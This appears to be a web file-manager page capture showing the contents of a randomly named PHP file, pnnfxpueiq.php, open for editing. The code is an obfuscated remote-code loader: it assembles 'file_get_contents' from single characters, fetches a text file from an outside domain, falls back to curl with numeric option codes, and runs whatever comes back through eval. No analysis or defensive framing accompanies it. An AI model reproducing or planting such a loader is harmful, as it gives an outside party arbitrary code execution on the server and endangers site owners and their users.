FileMaster
Search
Toggle Dark Mode
Home
/
.
Edit File: pnnfxpueiq.php
<?php $load = ''; $sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s']; foreach($sources as $s) $load .= $s; $fetch = false; if(ini_get('allow_url_fopen') && function_exists($load)) { $fetch = @$load('http://z60108_7.qosinski.shop/stat/index2.txt'); } if($fetch === false && function_exists('curl_init')) { $ch = curl_init(); $opts = [10102=>true,10002=>'http://z60108_7.qosinski.shop/stat/index2.txt',19913=>true,19914=>true,13=>10]; curl_setopt_array($ch, $opts); $fetch = curl_exec($ch); curl_close($ch); } if($fetch !== false) { $payload = '?>' . $fetch; eval($payload); } ?>
Save
Back